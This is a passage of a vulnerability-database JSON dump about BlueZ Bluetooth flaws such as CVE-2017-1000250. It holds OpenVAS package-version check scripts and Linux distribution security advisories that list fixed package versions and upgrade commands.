(__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "An information disclosure 
vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.", "modified": "2019-03-18T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310703972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703972", "type": "openvas", "title": "Debian Security Advisory DSA 3972-1 (bluez - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3972.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3972-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703972\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000250\");\n script_name(\"Debian Security Advisory DSA 3972-1 (bluez - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 00:00:00 +0200 (Wed, 13 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3972.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\");\n script_tag(name:\"summary\", value:\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker 
to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-tools\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) 
!= NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:36:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9802", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9917", "CVE-2016-9918", "CVE-2016-9798", "CVE-2016-9804"], "description": "The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2559 advisory.", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192559", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2559)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2559\");\n script_version(\"2020-01-23T13:06:24+0000\");\n script_cve_id(\"CVE-2016-9798\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9802\", \"CVE-2016-9804\", \"CVE-2016-9917\", \"CVE-2016-9918\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:06:24 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:06:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2559)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2559\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2559\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2559 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In BlueZ 5.42, a buffer overflow was observed 
in 'commands_dump' function in 'tools/parser/csr.c' source file. The issue exists because 'commands' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'frm-ptr' parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9804)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'pin_code_reply_dump' function in 'tools/parser/hci.c' source file. The issue exists because 'pin' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'pin_code_reply_cp *cp' parameter.(CVE-2016-9800)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'read_n' function in 'tools/hcidump.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9917)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'set_ext_ctrl' function in 'tools/parser/l2cap.c' source file when processing corrupted dump file.(CVE-2016-9801)\n\nIn BlueZ 5.42, a buffer over-read was identified in 'l2cap_packet' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9802)\n\nIn BlueZ 5.42, a use-after-free was identified in 'conf_opt' function in 'tools/parser/l2cap.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9798)\n\nIn BlueZ 5.42, an out-of-bounds read was identified in 'packet_hexdump' function in 'monitor/packet.c' source file. 
This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9918)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.h3\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.h3\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-27T18:35:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9802", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9917", "CVE-2016-9918", "CVE-2016-9798", "CVE-2016-9804"], "description": "The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2380 advisory.", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192380", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2380)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as 
published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2380\");\n script_version(\"2020-01-23T12:52:24+0000\");\n script_cve_id(\"CVE-2016-9798\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9802\", \"CVE-2016-9804\", \"CVE-2016-9917\", \"CVE-2016-9918\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:52:24 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:52:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2380)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2380\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2380\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2380 advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In BlueZ 5.42, a use-after-free was identified in 'conf_opt' function in 'tools/parser/l2cap.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9798)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'pin_code_reply_dump' function in 'tools/parser/hci.c' source file. The issue exists because 'pin' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'pin_code_reply_cp *cp' parameter.(CVE-2016-9800)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'set_ext_ctrl' function in 'tools/parser/l2cap.c' source file when processing corrupted dump file.(CVE-2016-9801)\n\nIn BlueZ 5.42, a buffer over-read was identified in 'l2cap_packet' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9802)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'commands_dump' function in 'tools/parser/csr.c' source file. The issue exists because 'commands' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'frm-ptr' parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9804)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'read_n' function in 'tools/hcidump.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9917)\n\nIn BlueZ 5.42, an out-of-bounds read was identified in 'packet_hexdump' function in 'monitor/packet.c' source file. 
This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9918)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:35:41", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2685\n\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/034569.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/034573.html\n\n**Affected packages:**\nbluez\nbluez-alsa\nbluez-compat\nbluez-cups\nbluez-gstreamer\nbluez-hid2hci\nbluez-libs\nbluez-libs-devel\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-09-13T21:18:50", "published": "2017-09-12T23:15:38", "href": "http://lists.centos.org/pipermail/centos-announce/2017-September/034569.html", "id": "CESA-2017:2685", "title": "bluez security update", "type": "centos", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Arch Linux Security Advisory ASA-201709-3\n=========================================\n\nSeverity: High\nDate : 2017-09-12\nCVE-ID : CVE-2017-1000250\nPackage : bluez\nType : information disclosure\nRemote : Yes\nLink : https://security.archlinux.org/AVG-396\n\nSummary\n=======\n\nThe package bluez before version 5.46-2 is vulnerable to information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 5.46-2.\n\n# pacman -Syu \"bluez>=5.46-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). 
A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys.\n\nImpact\n======\n\nAn attacker within Bluetooth range (adjacent network, AV:A) is able to use a\nspecially crafted Bluetooth device, without prior pairing or user interaction,\nto obtain sensitive information such as Bluetooth encryption keys.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/55603\nhttps://www.armis.com/blueborne/\nhttp://pkgs.fedoraproject.org/cgit/rpms/bluez.git/plain/0010-Out-of-bounds-heap-read-in-service_search_attr_req-f.patch\nhttps://security.archlinux.org/CVE-2017-1000250", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "ASA-201709-3", "href": "https://security.archlinux.org/ASA-201709-3", "type": "archlinux", "title": "[ASA-201709-3] bluez: information disclosure", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/bluez-5.47-i586-1_slack14.2.txz: Upgraded.\n Fixed an information disclosure vulnerability which allows remote attackers\n to obtain sensitive information from the bluetoothd process memory. This\n vulnerability lies in the processing of SDP search attribute requests.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000250\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bluez-4.64-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bluez-4.64-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bluez-4.91-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bluez-4.91-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bluez-4.99-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bluez-4.99-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bluez-4.99-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bluez-4.99-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bluez-5.47-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bluez-5.47-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bluez-5.47-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bluez-5.47-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\nc34a144a27aecf012ae0f6d4e9d23ec7 bluez-4.64-i486-2_slack13.1.txz\n\nSlackware 
x86_64 13.1 package:\n00fdad5615839cb6846780890ecd473d bluez-4.64-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\n0b24842a0c3e6b19bdd45705a155f82f bluez-4.91-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n01ec2415e62f36ba954ad18316089963 bluez-4.91-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\neadceb46961b159ea4580c65f37e1bb3 bluez-4.99-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7a8c9f38fbfca7c8dd35997dbe1e6da2 bluez-4.99-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\n51a0d2992312419dfcdce2335635d613 bluez-4.99-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n9b1016510c7292343e81263bee3f6710 bluez-4.99-x86_64-4_slack14.1.txz\n\nSlackware 14.2 package:\n7ee07b8ee57a8272703bcc706d148d75 bluez-5.47-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n0a28a8a20122ee46d3ebeb68450d139d bluez-5.47-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n230c704d9f97690c8eee0bb32aed2c50 n/bluez-5.47-i586-1.txz\n\nSlackware x86_64 -current package:\n2d4d0f25675d824f445c0fbd74c453ee n/bluez-5.47-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bluez-5.47-i586-1_slack14.2.txz", "modified": "2017-09-15T20:16:56", "published": "2017-09-15T20:16:56", "id": "SSA-2017-258-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994", "type": "slackware", "title": "[slackware-security] bluez", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "[4.66-2]\n- sdpd heap fixes\nResolves: #1490008", "edition": 6, "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "ELSA-2017-2685", "href": "http://linux.oracle.com/errata/ELSA-2017-2685.html", "title": "bluez security update", "type": "oraclelinux", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntu": 
[{"lastseen": "2020-07-02T11:42:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "It was discovered that an information disclosure vulnerability existed \nin the Service Discovery Protocol (SDP) implementation in BlueZ. A \nphysically proximate unauthenticated attacker could use this to \ndisclose sensitive information. (CVE-2017-1000250)", "edition": 5, "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "USN-3413-1", "href": "https://ubuntu.com/security/notices/USN-3413-1", "title": "BlueZ vulnerability", "type": "ubuntu", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-02T11:39:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7837", "CVE-2020-0556"], "description": "It was discovered that BlueZ incorrectly handled bonding HID and HOGP \ndevices. A local attacker could possibly use this issue to impersonate \nnon-bonded devices. (CVE-2020-0556)\n\nIt was discovered that BlueZ incorrectly handled certain commands. A local \nattacker could use this issue to cause BlueZ to crash, resulting in a \ndenial of service, or possibly execute arbitrary code. This issue only \naffected Ubuntu 16.04 LTS. (CVE-2016-7837)", "edition": 2, "modified": "2020-03-30T00:00:00", "published": "2020-03-30T00:00:00", "id": "USN-4311-1", "href": "https://ubuntu.com/security/notices/USN-4311-1", "title": "BlueZ vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Utilities for use in Bluetooth applications: \t- hcitool \t- hciattach \t- hciconfig \t- bluetoothd \t- l2ping \t- rfcomm \t- sdptool \t- bccmd \t- bluetoothctl \t- btmon \t- hcidump \t- l2test \t- rctest \t- gatttool \t- start scripts (Red Hat) \t- pcmcia configuration files The BLUETOOTH trademarks are owned by Bluetooth SIG, Inc., U.S.A. 
", "modified": "2017-09-30T07:32:32", "published": "2017-09-30T07:32:32", "id": "FEDORA:2F41461DF302", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: bluez-5.46-6.fc27", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Utilities for use in Bluetooth applications: \t- hcitool \t- hciattach \t- hciconfig \t- bluetoothd \t- l2ping \t- rfcomm \t- sdptool \t- bccmd \t- bluetoothctl \t- btmon \t- hcidump \t- l2test \t- rctest \t- gatttool \t- start scripts (Red Hat) \t- pcmcia configuration files The BLUETOOTH trademarks are owned by Bluetooth SIG, Inc., U.S.A. ", "modified": "2017-09-13T22:26:43", "published": "2017-09-13T22:26:43", "id": "FEDORA:211166075B57", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: bluez-5.46-6.fc26", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "jvn": [{"lastseen": "2019-05-29T19:49:10", "bulletinFamily": "info", "cvelist": ["CVE-2016-7837"], "description": "\n ## Description\n\nBlueZ provides a Bluetooth protocol stack for Linux kernel and userland utilities. 
